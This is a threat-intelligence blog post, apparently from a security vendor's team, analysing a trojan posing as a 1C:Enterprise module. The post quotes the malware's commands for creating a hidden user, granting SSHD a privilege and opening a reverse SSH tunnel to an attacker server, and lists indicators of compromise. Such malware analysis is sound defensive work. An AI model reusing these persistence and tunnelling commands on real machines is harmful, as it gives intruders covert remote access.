Copy, copy, can you hear us?

More in General
- Operation Chewbacca
At the end of June, the PT ESC team, during incident investigations, discovered a new group…
- Ding, ding — who's there?
Ding, ding — who's there? 🔔 The cyber intelligence group of Positive Technologies' expert security center…
- Enterprise-grade validation system with schema support
Enterprise-grade validation system with schema support (c) The author of a dozen trojans who forgot to…
- One less feathered thief — plus one hundred rating points!
One less feathered thief — plus one hundred rating points! 😵 The Threat Intelligence team at…
- DragonDoll: a matryoshka in the world of Android spies
DragonDoll: a matryoshka in the world of Android spies 🪆 At the beginning of this spring,…
Despite the fact that hackers have recently gotten lazy and increasingly don’t develop anything of their own, original attack ideas still occasionally come along.
In an archive with the loud name
1С_модуль_заказа_дрон-v11.zip there’s a file called СВЯЗЬ РЭБ список Гум.exe with the yellow “1C” icon familiar to everyone. When the file is launched, the user sees the standard loading window of “1C:Enterprise 8.3” followed by the opening of a database (screenshot 1). 🎇 Let’s not fall for the bright pictures and dig deeper. Using sfextract, we gut the .NET installer. Among the unpacked files we find
1C_Module.dll with suspiciously large resources. The library contains a huge number of legitimate “1C” classes, and the file itself at first glance looks like a legitimate module. But when searching for points of interaction with resources, we find a patched class \_1CManifestDelegateRunner.
In the InitManifest method, the resource
_1C_Module.tmp is decrypted and saved to the temp folder. The decrypted file turns out to be a Go dropper that decrypts 2️⃣3️⃣ files. Among them:📏 10 executable files
📏 6 scripts
📏 7 resource and config files
Most of the files are a complete set for setting up an SSH connection, public and private keys, and configs. The scripts perform the following actions:
📏 Create a new user with credentials:
$sshUserName = "config"
$sshUserPass = "[REDACTED]"
Code language: PowerShell (powershell)📏 Copy all files to the folder
C:\Program Files\System Event Service📏 Launch SSHD and ssh-agent, having configured the public and private key
📏 Launch ntrights with the parameters
-u "NT SERVICE\SSHD" +r SeAssignPrimaryTokenPrivilege📏 Launch the mysterious file
shh-tunnel.exe or, subsequently renamed, syseventservice-update.exe❔ Let’s dwell on the last point in more detail, since shh-tunnel.exe is not part of standard SSH. This executable is written in Go and is a tool for establishing a tunnel, which we named
Go2Tunnel. It pulls ports from the nearby config ssh_tunnel_config (or syseventservice-update_config) to create the tunnel:
C:\\Program Files\\System Event Service\\ssh.exe -R <ServerTunnelPort> :127.0.0.1:22 -N -T -i \"C:\\Program Files\\System Event Service\\event-server\" -o StrictHostKeyChecking=no -o ExitOnForwardFailure=yes -o ServerAliveInterval=45 -p<ServerSshPort> <ServerUserLogin>@<serverHostname>
Code language: YAML (yaml)In the case when
serverTunnelPort is not specified, a POST request is made to the following address:
http://<serverHostname>:<ServerWebPort>/tunnel/register
Code language: YAML (yaml)😌🐱🐱
After creating the tunnel, Go2Tunnel itself just sleeps
-Command "Get-NetTCPConnection -RemoteAddress <serverHostname> -RemotePort <ServerSshPort> -State Established -OwningProcess <sshProcess_Pid>"
Code language: plaintext (plaintext)If there is no response, the SSH process is terminated, the address is resolved from the config, and the tunnel is restarted.
🎇 IoCs:
15b3dcd795d417c69a627e13382800cc0cf005e9f5d0345e22a02f460b052ea1
2de2c9ab37ce5abfcd7e9018b1cb00066209b0b9ecdf70249148f53389dca5b1
5faa4da85e2657682fd40f5a86d61e87a3e70c3dff81335f226437c755a89f4a
6aa1fc0c2b7a01952b92e7af4f69fc602d34da95a872c57e7cfe34e918086c89
957a9705b200cd0f059d62d7b21e97db260b9b6c0c5ddf20c38d236103cb799b
fac77b7f1150c00dd5ca9da0f93e2f073a7eb70e2f4fd82a267afbc938a6e175
16.16.179.83
5.252.22.10
Code language: plaintext (plaintext)


#TI #phishing #ioc
@ptescalator
More in General
- Operation Chewbacca
At the end of June, the PT ESC team, during incident investigations, discovered a new group…
- Ding, ding — who's there?
Ding, ding — who's there? 🔔 The cyber intelligence group of Positive Technologies' expert security center…
- Enterprise-grade validation system with schema support
Enterprise-grade validation system with schema support (c) The author of a dozen trojans who forgot to…
- One less feathered thief — plus one hundred rating points!
One less feathered thief — plus one hundred rating points! 😵 The Threat Intelligence team at…
- DragonDoll: a matryoshka in the world of Android spies
DragonDoll: a matryoshka in the world of Android spies 🪆 At the beginning of this spring,…



